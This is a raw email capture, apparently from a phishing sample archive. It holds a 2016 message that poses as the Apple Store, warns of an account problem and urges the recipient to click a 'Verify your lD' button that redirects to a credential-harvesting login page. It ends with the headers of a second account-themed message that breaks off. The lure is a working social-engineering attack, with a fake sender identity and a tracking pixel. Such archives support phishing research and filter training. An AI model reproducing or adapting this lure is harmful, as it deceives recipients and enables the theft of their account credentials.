From: =?utf-8?B?QXBwU3RvcmU=?= <do-not-reply@newsletter.eu>
Reply-To: <no-reply@newsletter.eu>
Mime-Version: 1.0
Subject: =?utf-8?B?WW91IGhhdmUgYSBwcm9ibGVtIHdpdGggeW91ciBBcHBsZSBhY2NvdW50?=
Date: Wed, 24 Feb 2016 05:29:41 +0800
To: jose@monkey.org
Precedence: bulk
List-Unsubscribe: <http://facheup22.newsletter.eu/system/public/unsubscribe_confirm/?member_id=&contact_id=73946657&contact_email=jose@monkey.org>
Content-Type: multipart/alternative; boundary="Newsletter-Alternative-5e4e1853c1d58803602386e8fc572c31"
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 84

--Newsletter-Alternative-5e4e1853c1d58803602386e8fc572c31
Content-Type: text/plain; charset=utf-8

You are viewing this plain text version of email because your email client does not support HTML emails.

To view this email follow the link below:

http://facheup22.newsletter.eu/system/public/view_newsletter/?newsletter_queue_id=NDg5NDY3&contact_id=73946657&contact_email=jose@monkey.org

--Newsletter-Alternative-5e4e1853c1d58803602386e8fc572c31
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
	<html ondragover="" ondrop="">
		<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
			<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
			
<meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;">

			<style type="text/css">body { width: 100% !important;}</style>
		</head>
		
<body style="PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; ;"><div style="font-size:2px">&nbsp;</div>
									<div style="font-family:Verdana;font-size:11px;">
										<a href="http://facheup22.newsletter.eu/system/public/view_newsletter/?newsletter_queue_id=NDg5NDY3&contact_id=73946657&contact_email=jose@monkey.org">Click Here</a> to view this newsletter in your browser.
									</div>
									<div style="font-size:5px">&nbsp;</div></div><br /></center>

<table style="width: 100%;">
<tbody>
<tr>
<td align="center" style="background-color: #e9e9e9; padding: 10px;">
<table border="0" cellpadding="0" cellspacing="0" style="width: 600px;">
<tbody>
<tr>
<td align="center" style="line-height: 22px; padding: 10px;" valign="top">
<div style="font-size: 14px; font-family: Arial; color: #ffffff;"></div>
</td>
</tr>
<tr>
<td style="background: #d9d9d9; border-color: #5b5b5b; padding: 0px;" valign="top">
<div>
<table border="0" cellpadding="0" cellspacing="0" style="width: 600px;">
<tbody>
<tr>
<td align="left" style="background: #ffffff; line-height: 22px; border-color: #ffffff;" valign="top">
<table align="left" border="0" cellpadding="0" cellspacing="0" style="width: 600px;">
<tbody>
<tr>
<td style="mso-table-lspace: 0; mso-table-rspace: 0; padding: 0px;" valign="top">
<div align="center"><img height="54" src="https://i61.tinypic.com/34xnm7k.jpg" width="600" /></div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</div>
<div>
<table border="0" cellpadding="0" cellspacing="0" style="width: 600px;">
<tbody>
<tr>
<td align="left" style="background: #ffffff; line-height: 22px; border-color: #ffffff;" valign="top">
<table align="left" border="0" cellpadding="0" cellspacing="0" style="width: 200px;">
<tbody>
<tr>
<td style="mso-table-lspace: 0; mso-table-rspace: 0; padding: 0px;" valign="top"></td>
</tr>
</tbody>
</table>
<table border="0" cellpadding="0" cellspacing="0" style="width: 400px;">
<tbody>
<tr>
<td style="; mso-table-lspace: 0; mso-table-rspace: 0;" valign="top">
<div style="font-size: 14px; font-family: Arial; color: #747474;">

<p style="font-size: 24px;"><strong style="font-size: 24px;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Apple Store</strong></p>

</div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</div>
<div>
<table border="0" cellpadding="0" cellspacing="0" style="width: 600px;">
<tbody>
<tr>
<td align="left" style="background: #ffffff; line-height: 22px; border-color: #ffffff;" valign="top">
<table align="left" border="0" cellpadding="0" cellspacing="0" style="width: 600px;">
<tbody>
<tr>
<td style="mso-table-lspace: 0; mso-table-rspace: 0; padding: 0px;" valign="top"></td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</div>
<div>
<table border="0" cellpadding="0" cellspacing="0" style="width: 600px;">
<tbody>
<tr>
<td align="left" style="background: #F4F4F4; line-height: 22px; border-color: #ffffff;" valign="top">
<table align="left" border="0" cellpadding="0" cellspacing="0" style="width: 600px;">
<tbody>
<tr>

<td style="padding-bottom: 0px; padding-top: 0px; padding-left: 30px; padding-right: 30px; mso-table-lspace: 0; mso-table-rspace: 0;" valign="top">

<div style="font-size: 10px; font-family: Arial; color: #747474;">

<p align="justify"><span style="font-size: 15px;"><strong>You have a problem with your Apple account, We just need to verify that this e-mail address belongs to you. Simply click the link below and login using "Apple ID" and your password.</strong></span></p>

<p align="justify"></p>

<p align="justify"><span style="font-size: 12px;"><a href="http://www.newsletter.eu/link.php?src=YToyOntzOjQ6ImxpbmsiO3M6NzI6Imh0dHA6Ly9hcHB0ZXl0eW1tZXMudHdvbWluaS5jb20vcm9ja3kvbWFuYWdlci1ub3cvdXBkYXRlL2xvZ2luL2luZGV4LnBocCI7czoxOToibmV3c2xldHRlcl9xdWV1ZV9pZCI7aTo0ODk0Njc7fQ==" onclick="" style="text-decoration: none;">

<span style="font-size: 14px; text-decoration: none; font-family: Arial; width: 192px; min-width: 192px; color: #d9d9d9; text-align: center; margin: 2px; display: inline-block; background-color: #797979; border: #797979 1px solid;"><strong>Verify your lD</strong> </span></a></span></p>

</div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</div>
<div>
<table border="0" cellpadding="0" cellspacing="0" style="width: 600px;">
<tbody>
<tr>
<td align="left" style="background: #ffffff; line-height: 22px; border-color: #ffffff;" valign="top">
<table align="left" border="0" cellpadding="0" cellspacing="0" style="width: 600px;">
<tbody>
<tr>

<td style="padding-bottom: 0px; padding-top: 0px; padding-left: 0px; padding-right: 10px; mso-table-lspace: 0; mso-table-rspace: 0;" valign="top"></td>

</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</div>
<div>
<table border="0" cellpadding="0" cellspacing="0" style="width: 600px;">
<tbody>
<tr>
<td align="left" style="background: #ffffff; line-height: 22px; border-color: #ffffff;" valign="top">
<table align="left" border="0" cellpadding="0" cellspacing="0" style="width: 600px;">
<tbody>
<tr>
<td style="mso-table-lspace: 0; mso-table-rspace: 0; padding: 0px;" valign="top">
<div align="center"><img height="27" src="https://i62.tinypic.com/2dbl4io.png" width="600" /></div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</div>
</td>
</tr>
<tr>
<td align="center" style="line-height: 22px; padding: 10px;" valign="top">
<div style="font-size: 14px; font-family: Arial; color: #747474;">
<p align="center">Apple 2016 &copy; All rights reserved</p>
</div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<center><br /><div id="unsubscribe_info" style="display: block;"><div style="font-size:20px">&nbsp;</div> 
										<table align="center" cellpadding="0" cellspacing="0" width="100%">
									      <tr>
									        <td bgcolor="#FFFFFF" align="center">
												<div style="font-family:Verdana;font-size:11px; margin-top: 0px; margin-bottom: 7px;">Message sent to: jose@monkey.org </div>
												<div style="font-family:Verdana;font-size:11px; margin-top: 0px; margin-bottom: 10px;">Message sent from: AppStore, 58 Street Charilie, London, London (City of) - GB 2016</div>
                                                <div style="font-family:Verdana;font-size:11px; margin-top: 0px; margin-bottom: 0px;">
                                                	<img src="https://www.newsletter.eu/system/images/newsletter_profile_icon.png" />&nbsp;To unsubscribe, <a href="http://facheup22.newsletter.eu/system/public/unsubscribe_confirm/?member_id=MTAyOTM3&contact_id=73946657&contact_email=jose@monkey.org" target="_blank">click here</a><br /><br />
													<a href="http://www.newsletter.eu"><img src="https://facheup22.newsletter.eu/system/public/open_newsletter/?image_option=1&newsletter_queue_id=NDg5NDY3&contact_id=73946657&contact_email=jose@monkey.org" border="0" /></a>
                                                </div>
											</td>
									      </tr>
									     </table>
									     <div style="font-size:10px">&nbsp;</div>
									     </div></center>
</body>
	</html>

--Newsletter-Alternative-5e4e1853c1d58803602386e8fc572c31--


From jose@monkey.org Thu Feb 25 14:42:00 2016 +0000
Return-Path: laura@gaclaser.co.za
Delivered-To: jose@monkey.org
X-FDA: 71227237200.05.edge54_2e6f7690d0309
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 2,0,0,81f03c77c6139e02,d41d8cd98f00b204,laura@gaclaser.co.za,:laura@gaclaser.co.za,RULES_HIT:1:2:41:72:355:379:455:474:962:967:969:973:978:979:983:988:989:1189:1208:1221:1256:1260:1261:1313:1314:1345:1431:1432:1433:1434:1436:1437:1516:1517:1518:1571:1575:1588:1592:1594:1685:1730:1777:1792:1803:2194:2198:2199:2200:2525:2527:2538:2539:2559:2568:2570:2610:2627:2682:2685:2693:2703:2741:2859:2890:2891:2892:2893:2894:2897:2898:2910:2916:2917:2922:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3148:3353:3586:3650:3865:3866:3867:3868:3870:3871:3872:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4050:4310:4383:4384:4395:4605:4648:5007:6261:7210:7652:7903:8512:8516:8518:8599:8603:8885:8957:8987:9025:9059:9121:9149:9388:9411:9416:9908:9941:10049:10305:10346:11529:11658:12073:12217:12561:12740:12764:13038:13139:13163:13191:13192:13227:13229:13237:13975:14129,0,RBL:197.97.112.45:@gaclaser.co.za:.lbl8.mailshell.net-62.12.255.100 64.201.201.201,CacheIP
X-HE-Tag: edge54_2e6f7690d0309
X-Filterd-Recvd-Size: 12040
Received: from mta15-dc01.cm.synaq.com (mta15-dc01.cm.synaq.com [197.97.112.45])
	by imf26.b.hostedemail.com (Postfix) with ESMTP
	for <JOSE@MONKEY.ORG>; Thu, 25 Feb 2016 14:41:58 +0000 (UTC)
Received: from localhost (localhost [127.0.0.1])
	by mta15-dc01.cm.synaq.com (Postfix) with ESMTP id 689F31405C0;
	Thu, 25 Feb 2016 16:41:56 +0200 (SAST)
Received: from mta15-dc01.cm.synaq.com ([127.0.0.1])
	by localhost (mta15-dc01.cm.synaq.com [127.0.0.1]) (amavisd-new, port 10032)
	with ESMTP id S4qJEgNZANFJ; Thu, 25 Feb 2016 16:41:55 +0200 (SAST)
Received: from localhost (localhost [127.0.0.1])
	by mta15-dc01.cm.synaq.com (Postfix) with ESMTP id 6283814055D;
	Thu, 25 Feb 2016 16:41:55 +0200 (SAST)
X-Virus-Scanned: amavisd-new at mta15-dc01.cm.synaq.com
Received: from mta15-dc01.cm.synaq.com ([127.0.0.1])
	by localhost (mta15-dc01.cm.synaq.com [127.0.0.1]) (amavisd-new, port 10026)
	with ESMTP id EYosliUmjb9f; Thu, 25 Feb 2016 16:41:55 +0200 (SAST)
Received: from [192.168.1.219] (unknown [197.232.30.102])
	by mta15-dc01.cm.synaq.com (Postfix) with ESMTPA id 0CB6A14057C;
	Thu, 25 Feb 2016 16:41:35 +0200 (SAST)
Content-Type: multipart/alternative; boundary="===============0609948887=="
MIME-Version: 1.0
Subject: Important information about your account
To: Recipients <laura@gaclaser.co.za>
